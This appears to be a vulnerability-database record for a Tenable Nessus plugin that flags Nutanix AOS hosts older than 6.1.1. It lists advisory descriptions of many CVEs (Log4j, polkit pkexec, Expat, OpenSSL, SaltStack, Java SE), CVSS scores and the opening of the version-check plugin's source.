(CVE-2021-20271)\n\n - In Cyrus SASL 2.1.17 through 2.1.27 before 2.1.28, plugins/sql.c does not escape the password for a SQL INSERT or UPDATE statement. (CVE-2022-24407)\n\n - The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP upgrade connections was not released for WebSocket connections once the connection was closed. This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.\n (CVE-2021-42340)\n\n - A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according to predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends up trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way that it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation, giving unprivileged users administrative rights on the target machine. (CVE-2021-4034)\n\n - The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. 
The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). (CVE-2022-0778)\n\n - Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling (CVE-2022-22720)\n\n - An issue was discovered in SaltStack Salt before 3003.3. A user who has control of the source, and source_hash URLs can gain full file system access as root on a salt minion. 
(CVE-2021-21996)\n\n - In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).\n (CVE-2021-45960)\n\n - In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for m_groupSize. (CVE-2021-46143)\n\n - addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22822)\n\n - build_model in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22823)\n\n - defineAttribute in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.\n (CVE-2022-22824)\n\n - lookup in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22825)\n\n - nextScaffoldPart in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.\n (CVE-2022-22826)\n\n - storeAtts in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22827)\n\n - Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with a nonzero XML_CONTEXT_BYTES. (CVE-2022-23852)\n\n - xmltok_impl.c in Expat (aka libexpat) before 2.4.5 lacks certain validation of encoding, such as checks for whether a UTF-8 character is valid in a certain context. (CVE-2022-25235)\n\n - xmlparse.c in Expat (aka libexpat) before 2.4.5 allows attackers to insert namespace-separator characters into namespace URIs. (CVE-2022-25236)\n\n - In Expat (aka libexpat) before 2.4.5, there is an integer overflow in storeRawNames. (CVE-2022-25315)\n\n - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft source code that renders different logic than the logical ordering of tokens ingested by compilers and interpreters. 
Adversaries can leverage this to encode source code for compilers accepting Unicode such that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard and the Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to-right and right-to-left characters, the visual order of tokens may be different from their logical order.\n Additionally, control characters needed to fully support the requirements of bidirectional text can further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such that the ordering of tokens perceived by human reviewers does not match what will be processed by a compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.\n (CVE-2021-42574)\n\n - sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalation because supplemental groups are not initialized as expected. 
Helper programs for AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group memberships of the sshd process, if the configuration specifies running the command as a different user.\n (CVE-2021-41617)\n\n - Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.\n (CVE-2019-17571)\n\n - Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1 (CVE-2020-9488)\n\n - JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2022-23302)\n\n - By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. 
Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default.\n Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2022-23305)\n\n - CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists. (CVE-2022-23307)\n\n - A memory leak flaw was found in the Linux kernel performance monitoring subsystem when using PERF_EVENT_IOC_SET_FILTER. A local user could use this flaw to starve the resources causing denial of service. (CVE-2020-25704)\n\n - An issue was discovered in the FUSE filesystem implementation in the Linux kernel before 5.10.6, aka CID-5d069dbe8aaf. fuse_do_getattr() calls make_bad_inode() in inappropriate situations, causing a system crash. NOTE: the original fix for this vulnerability was incomplete, and its incompleteness is tracked as CVE-2021-28950. (CVE-2020-36322)\n\n - A heap-based buffer overflow flaw was found in the Linux kernel FireDTV media card driver, where the user calls the CA_SEND_MSG ioctl. This flaw allows a local user of the host machine to crash the system or escalate privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-42739)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. 
(CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users. (CVE-2020-11652)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-01T00:00:00", "type": "nessus", "title": "Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.1.1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2019-17571", "CVE-2020-0465", "CVE-2020-0466", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-25704", "CVE-2020-25709", "CVE-2020-25710", "CVE-2020-36322", "CVE-2020-36385", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9493", "CVE-2021-0920", "CVE-2021-20271", "CVE-2021-21996", "CVE-2021-22543", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-26691", "CVE-2021-28950", "CVE-2021-30640", "CVE-2021-34798", "CVE-2021-35550", "CVE-2021-35556", "CVE-2021-35559", 
"CVE-2021-35561", "CVE-2021-35564", "CVE-2021-35565", "CVE-2021-35567", "CVE-2021-35578", "CVE-2021-35586", "CVE-2021-35588", "CVE-2021-35603", "CVE-2021-3564", "CVE-2021-3573", "CVE-2021-3653", "CVE-2021-3656", "CVE-2021-3752", "CVE-2021-37576", "CVE-2021-39275", "CVE-2021-4034", "CVE-2021-40438", "CVE-2021-4104", "CVE-2021-4155", "CVE-2021-41617", "CVE-2021-42340", "CVE-2021-42574", "CVE-2021-42739", "CVE-2021-43527", "CVE-2021-44228", "CVE-2021-44790", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2021-45417", "CVE-2021-45960", "CVE-2021-46143", "CVE-2022-0330", "CVE-2022-0778", "CVE-2022-21248", "CVE-2022-21277", "CVE-2022-21282", "CVE-2022-21283", "CVE-2022-21291", "CVE-2022-21293", "CVE-2022-21294", "CVE-2022-21296", "CVE-2022-21299", "CVE-2022-21305", "CVE-2022-21340", "CVE-2022-21341", "CVE-2022-21349", "CVE-2022-21360", "CVE-2022-21365", "CVE-2022-21366", "CVE-2022-22720", "CVE-2022-22822", "CVE-2022-22823", "CVE-2022-22824", "CVE-2022-22825", "CVE-2022-22826", "CVE-2022-22827", "CVE-2022-22942", "CVE-2022-23181", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23852", "CVE-2022-24407", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25315"], "modified": "2023-01-12T00:00:00", "cpe": ["cpe:/o:nutanix:aos"], "id": "NUTANIX_NXSA-AOS-6_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/164572", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164572);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\n \"CVE-2016-4658\",\n \"CVE-2019-17571\",\n \"CVE-2020-0465\",\n \"CVE-2020-0466\",\n \"CVE-2020-9484\",\n \"CVE-2020-9488\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\",\n \"CVE-2020-25704\",\n \"CVE-2020-25709\",\n \"CVE-2020-25710\",\n \"CVE-2020-36322\",\n \"CVE-2020-36385\",\n \"CVE-2021-0920\",\n \"CVE-2021-3564\",\n \"CVE-2021-3573\",\n \"CVE-2021-3653\",\n 
\"CVE-2021-3656\",\n \"CVE-2021-3752\",\n \"CVE-2021-4034\",\n \"CVE-2021-4104\",\n \"CVE-2021-4155\",\n \"CVE-2021-20271\",\n \"CVE-2021-21996\",\n \"CVE-2021-22543\",\n \"CVE-2021-23840\",\n \"CVE-2021-23841\",\n \"CVE-2021-26691\",\n \"CVE-2021-30640\",\n \"CVE-2021-34798\",\n \"CVE-2021-35550\",\n \"CVE-2021-35556\",\n \"CVE-2021-35559\",\n \"CVE-2021-35561\",\n \"CVE-2021-35564\",\n \"CVE-2021-35565\",\n \"CVE-2021-35567\",\n \"CVE-2021-35578\",\n \"CVE-2021-35586\",\n \"CVE-2021-35588\",\n \"CVE-2021-35603\",\n \"CVE-2021-37576\",\n \"CVE-2021-39275\",\n \"CVE-2021-40438\",\n \"CVE-2021-41617\",\n \"CVE-2021-42340\",\n \"CVE-2021-42574\",\n \"CVE-2021-42739\",\n \"CVE-2021-43527\",\n \"CVE-2021-44228\",\n \"CVE-2021-44790\",\n \"CVE-2021-44832\",\n \"CVE-2021-45046\",\n \"CVE-2021-45105\",\n \"CVE-2021-45417\",\n \"CVE-2021-45960\",\n \"CVE-2021-46143\",\n \"CVE-2022-0330\",\n \"CVE-2022-0778\",\n \"CVE-2022-21248\",\n \"CVE-2022-21277\",\n \"CVE-2022-21282\",\n \"CVE-2022-21283\",\n \"CVE-2022-21291\",\n \"CVE-2022-21293\",\n \"CVE-2022-21294\",\n \"CVE-2022-21296\",\n \"CVE-2022-21299\",\n \"CVE-2022-21305\",\n \"CVE-2022-21340\",\n \"CVE-2022-21341\",\n \"CVE-2022-21349\",\n \"CVE-2022-21360\",\n \"CVE-2022-21365\",\n \"CVE-2022-21366\",\n \"CVE-2022-22720\",\n \"CVE-2022-22822\",\n \"CVE-2022-22823\",\n \"CVE-2022-22824\",\n \"CVE-2022-22825\",\n \"CVE-2022-22826\",\n \"CVE-2022-22827\",\n \"CVE-2022-22942\",\n \"CVE-2022-23181\",\n \"CVE-2022-23302\",\n \"CVE-2022-23305\",\n \"CVE-2022-23307\",\n \"CVE-2022-23852\",\n \"CVE-2022-24407\",\n \"CVE-2022-25235\",\n \"CVE-2022-25236\",\n \"CVE-2022-25315\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n 
script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.1.1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Nutanix AOS host is affected by multiple vulnerabilities .\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of AOS installed on the remote host is prior to 6.1.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the NXSA-AOS-6.1.1 advisory.\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311,\n 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Difficult to exploit vulnerability\n allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE,\n Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized\n update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible\n data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java\n Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes\n from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by\n using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS\n 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).\n (CVE-2022-21248)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: ImageIO). 
Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle\n GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM\n Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a\n partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This\n vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21277, CVE-2022-21366)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01;\n Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle\n GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read\n access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This\n vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security. 
This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).\n (CVE-2022-21282, CVE-2022-21296)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Libraries). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle\n GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM\n Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a\n partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This\n vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21283)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13,\n 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle\n GraalVM Enterprise Edition. 
Successful attacks of this vulnerability can result in unauthorized update,\n insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web\n Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from\n the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).\n (CVE-2022-21291, CVE-2022-21305)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13,\n 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle\n GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web\n Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from\n the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Availability impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21293, CVE-2022-21294, CVE-2022-21340)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01;\n Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle\n GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web\n Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from\n the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21299)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311,\n 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability\n allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE,\n Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized\n ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise\n Edition. 
Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java\n Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes\n from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by\n using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS\n 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21341)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: 2D). Supported versions that are affected are Oracle Java SE: 7u321, 8u311; Oracle GraalVM\n Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise\n Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This\n vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21349)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13,\n 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. 
Easily exploitable vulnerability allows\n unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle\n GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web\n Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from\n the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21360, CVE-2022-21365)\n\n - NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow\n when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures\n encoded within CMS, S/MIME, PKCS \\#7, or PKCS \\#12 are likely to be impacted. Applications using NSS for\n certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how\n they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and\n PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and\n Evince are believed to be impacted. 
This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\n (CVE-2021-43527)\n\n - xpointer.c in libxml2 before 2.9.5 (as used in Apple iOS before 10, OS X before 10.12, tvOS before 10, and\n watchOS before 3, and other products) does not forbid namespace nodes in XPointer ranges, which allows\n remote attackers to execute arbitrary code or cause a denial of service (use-after-free and memory\n corruption) via a crafted XML document. (CVE-2016-4658)\n\n - AIDE before 0.17.4 allows local users to obtain root privileges via crafted file metadata (such as XFS\n extended attributes or tmpfs ACLs), because of a heap-based buffer overflow. (CVE-2021-45417)\n\n - Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are\n vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI\n LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by\n limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n (CVE-2021-44832)\n\n - An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass\n RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users\n with the ability to start and control a VM to read/write random pages of memory and can result in local\n privilege escalation. (CVE-2021-22543)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when\n processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested\n guest (L2). Due to improper validation of the int_ctl field, this issue could allow a malicious L1 to\n enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. 
As a result, the L2 guest\n would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak\n of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to\n 5.14-rc7. (CVE-2021-3653)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when\n processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested\n guest (L2). Due to improper validation of the virt_ext field, this issue could allow a malicious L1 to\n disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the\n L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire\n system, leak of sensitive data or potential guest-to-host escape. (CVE-2021-3656)\n\n - arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc platform allows KVM guest\n OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e. (CVE-2021-37576)\n\n - Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI\n features used in configuration, log messages, and parameters do not protect against attacker controlled\n LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters\n can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From\n log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3,\n and 